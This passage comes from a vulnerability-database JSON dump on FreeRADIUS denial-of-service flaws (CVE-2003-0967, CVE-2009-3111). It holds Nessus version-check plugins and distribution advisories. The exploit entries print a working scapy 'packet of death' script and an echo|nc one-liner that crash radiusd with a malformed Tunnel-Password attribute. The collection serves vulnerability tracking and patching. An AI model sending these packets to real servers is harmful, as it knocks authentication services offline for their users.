pkgname:\"freeradius-mysql\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-postgresql\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-dbg / freeradius-dialupadmin / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T10:40:14", "description": "freeRADIUS Vulnerability Notifications reports :\n\n2009.09.09 v1.1.7 - Anyone who can send packets to the server can\ncrash it by sending a Tunnel-Password attribute in an Access-Request\npacket. This vulnerability is not otherwise exploitable. We have\nreleased 1.1.8 to correct this vulnerability.\n\nThis issue is similar to the previous Tunnel-Password issue noted\nbelow. The vulnerable versions are 1.1.3 through 1.1.7. Version 2.x is\nnot affected.", "edition": 26, "published": "2009-12-15T00:00:00", "title": "FreeBSD : freeradius -- remote packet of death vulnerability (1b3f854b-e4bd-11de-b276-000d8787e1be)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2009-12-15T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:freeradius"], "id": "FREEBSD_PKG_1B3F854BE4BD11DEB276000D8787E1BE.NASL", "href": "https://www.tenable.com/plugins/nessus/43161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43161);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3111\");\n script_xref(name:\"EDB-ID\", value:\"9642\");\n\n script_name(english:\"FreeBSD : freeradius -- remote packet of death vulnerability (1b3f854b-e4bd-11de-b276-000d8787e1be)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"freeRADIUS Vulnerability Notifications reports :\n\n2009.09.09 v1.1.7 - Anyone who can send packets to the server can\ncrash it by sending a Tunnel-Password attribute in an Access-Request\npacket. This vulnerability is not otherwise exploitable. We have\nreleased 1.1.8 to correct this vulnerability.\n\nThis issue is similar to the previous Tunnel-Password issue noted\nbelow. The vulnerable versions are 1.1.3 through 1.1.7. Version 2.x is\nnot affected.\"\n );\n # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3111\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://nvd.nist.gov/vuln/detail/CVE-2009-3111\"\n );\n # http://freeradius.org/security.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://freeradius.org/security/\"\n );\n # https://vuxml.freebsd.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08ccb3ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"freeradius<1.1.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:02:25", "description": "This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)", "edition": 23, "published": "2009-10-02T00:00:00", "title": "SuSE9 Security Update : freeradius (YOU Patch Number 12507)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2009-10-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12507.NASL", "href": "https://www.tenable.com/plugins/nessus/41964", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41964);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"SuSE9 Security Update : freeradius (YOU Patch Number 12507)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12507.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"freeradius-1.0.5-2.21\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"freeradius-devel-1.0.5-2.21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:44:06", "description": "This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)", "edition": 23, "published": "2009-10-02T00:00:00", "title": "SuSE 10 Security Update : freeradius (ZYPP Patch Number 6499)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2009-10-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FREERADIUS-6499.NASL", "href": "https://www.tenable.com/plugins/nessus/41966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41966);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"SuSE 10 Security Update : freeradius (ZYPP Patch Number 6499)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6499.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"freeradius-1.1.0-19.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"freeradius-devel-1.1.0-19.14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:44:06", "description": "This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)", "edition": 23, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : freeradius (ZYPP Patch Number 6528)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FREERADIUS-6528.NASL", "href": "https://www.tenable.com/plugins/nessus/49853", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49853);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"SuSE 10 Security Update : freeradius (ZYPP Patch Number 6528)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6528.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"freeradius-1.1.7-21.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"freeradius-devel-1.1.7-21.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-05-29T14:33:45", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0967"], "description": "FreeRADIUS is an Internet authentication daemon, which implements the\nRADIUS protocol. It allows Network Access Servers (NAS boxes) to perform\nauthentication for dial-up users.\n\nThe rad_decode function in FreeRADIUS 0.9.2 and earlier allows remote\nattackers to cause a denial of service (crash) via a short RADIUS string\nattribute with a tag, which causes memcpy to be called with a -1 length\nargument, as demonstrated using the Tunnel-Password attribute. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2003-0967 to this issue.\n \nUsers of FreeRADIUS are advised to upgrade to these erratum packages\ncontaining FreeRADIUS 0.9.3 which is not vulnerable to these issues.", "modified": "2017-07-29T20:27:18", "published": "2003-12-10T05:00:00", "id": "RHSA-2003:386", "href": "https://access.redhat.com/errata/RHSA-2003:386", "type": "redhat", "title": "(RHSA-2003:386) freeradius security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:46:37", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "FreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.", "modified": "2017-09-08T11:59:39", "published": "2009-09-17T04:00:00", "id": "RHSA-2009:1451", "href": "https://access.redhat.com/errata/RHSA-2009:1451", "type": "redhat", "title": "(RHSA-2009:1451) Moderate: freeradius security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T20:54:03", "description": "FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability. CVE-2003-0967. Dos exploit for linux platform", "published": "2003-11-20T00:00:00", "type": "exploitdb", "title": "FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0967"], "modified": "2003-11-20T00:00:00", "id": "EDB-ID:23391", "href": "https://www.exploit-db.com/exploits/23391/", "sourceData": "source: http://www.securityfocus.com/bid/9079/info\r\n\r\nFreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.\r\n\r\nThis issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.\r\n\r\nThis vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.\r\n\r\nUPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.\r\n\r\nbash-2.05$ echo -ne \"\\x01\\x01\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x45\\x02\" | nc -vu -w1 <victim> <port>\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23391/"}, {"lastseen": "2016-02-01T11:03:06", "description": "FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111). CVE-2009-3111. Dos exploits for multiple platform", "published": "2009-09-11T00:00:00", "type": "exploitdb", "title": "FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-11T00:00:00", "id": "EDB-ID:9642", "href": "https://www.exploit-db.com/exploits/9642/", "sourceData": "#!/usr/bin/env python\r\n# FreeRadius Packet Of Death\r\n# Matthew Gillespie 2009-09-11\r\n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py\r\n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/\r\n\r\nimport sys\r\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr\r\n\r\nif len(sys.argv) != 2:\r\n\tprint \"Usage: radius_killer.py <radiushost>\\n\"\r\n\tsys.exit(1)\r\n\r\nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\\r\n\tRadius(code=1,authenticator=\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\",id=180)/ \\\r\n\tRadiusAttr(type=69,value=\"\",len=2)\r\n\r\nsend(PoD)\r\n\r\n# milw0rm.com [2009-09-11]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9642/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0967"], "edition": 1, "description": "## Vulnerability Description\nFreeRADIUS 0.9.2, and earlier, contains a flaw that may allow a remote denial of service. The issue is triggered when reception of a malformed packet sent to the service occurs, and will result in loss of availability for the service. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an \"Access-Request\" packet containing a \"Tunnel-Password\" attribute.\n## Technical Description\nThe vulnerability is caused due to a boundary error caused by mishandling of certain tagged RADIUS attributes (e.g. the \"Tunnel-Password\" attribute). This may cause a heap overflow, which can be exploited by sending malformed packets to the service. Successful exploitation requires that the packets originate from an IP address listed as a RADIUS client. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an \"Access-Request\" packet containing a \"Tunnel-Password\" attribute.\n\n## Solution Description\nUpgrade to version 0.9.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nFreeRADIUS 0.9.2, and earlier, contains a flaw that may allow a remote denial of service. The issue is triggered when reception of a malformed packet sent to the service occurs, and will result in loss of availability for the service. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an \"Access-Request\" packet containing a \"Tunnel-Password\" attribute.\n## Manual Testing Notes\nPoC CODE: The following command will crash the radiusd daemon\n\nbash-2.05$ echo -ne \n\"\\x01\\x01\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x45\\x02\" \n| nc -vu -w1 <victim> <port> \n\n## References:\nVendor Specific Solution URL: ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz\n[Secunia Advisory ID:10271](https://secuniaresearch.flexerasoftware.com/advisories/10271/)\n[CVE-2003-0967](https://vulners.com/cve/CVE-2003-0967)\nBugtraq ID: 9079\n", "modified": "2003-11-20T03:12:14", "published": "2003-11-20T03:12:14", "href": "https://vulners.com/osvdb/OSVDB:2850", "id": "OSVDB:2850", "title": "FreeRADIUS Tagged Attribute Handling DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:31:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "It was discovered that FreeRADIUS did not correctly handle certain \nmalformed attributes. A remote attacker could exploit this flaw and cause \nthe FreeRADIUS server to crash, resulting in a denial of service.", "edition": 5, "modified": "2009-09-16T00:00:00", "published": "2009-09-16T00:00:00", "id": "USN-832-1", "href": "https://ubuntu.com/security/notices/USN-832-1", "title": "FreeRADIUS vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:25:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1451\n\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028266.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028267.html\n\n**Affected packages:**\nfreeradius\nfreeradius-mysql\nfreeradius-postgresql\nfreeradius-unixODBC\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1451.html", "edition": 3, "modified": "2009-10-30T14:43:49", "published": "2009-10-30T14:43:49", "href": "http://lists.centos.org/pipermail/centos-announce/2009-October/028266.html", "id": "CESA-2009:1451", "title": "freeradius security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:57", "description": "", "published": "2009-09-11T00:00:00", "type": "packetstorm", "title": "FreeRadius Packet Of Death", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-11T00:00:00", "id": "PACKETSTORM:81198", "href": "https://packetstormsecurity.com/files/81198/FreeRadius-Packet-Of-Death.html", "sourceData": "`#!/usr/bin/env python \n# FreeRadius Packet Of Death \n# Matthew Gillespie 2009-09-11 \n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py \n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/ \n \nimport sys \nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr \n \nif len(sys.argv) != 2: \nprint \"Usage: radius_killer.py <radiushost>\\n\" \nsys.exit(1) \n \nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\ \nRadius(code=1,authenticator=\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\",id=180)/ \\ \nRadiusAttr(type=69,value=\"\",len=2) \n \nsend(PoD) \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/81198/freeradius-dos.txt"}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:59", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "[1.1.3-1.5]\n- Security: Fix Tunnel-Password zero-length attributes flaw (bug #521912)\n Resolves: RH BZ#522062\n- rebase a couple of old patches (freeradius-0.9.0-com_err.patch,\n freeradius-1.0.0-samba3.patch) so they apply with fuzz=0 ", "edition": 4, "modified": "2009-09-17T00:00:00", "published": "2009-09-17T00:00:00", "id": "ELSA-2009-1451", "href": "http://linux.oracle.com/errata/ELSA-2009-1451.html", "title": "freeradius security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "\nfreeRADIUS Vulnerability Notifications reports:\n\n2009.09.09 v1.1.7 - Anyone who can send packets to\n\t the server can crash it by sending a Tunnel-Password\n\t attribute in an Access-Request packet. This\n\t vulnerability is not otherwise exploitable. We have\n\t released 1.1.8 to correct this 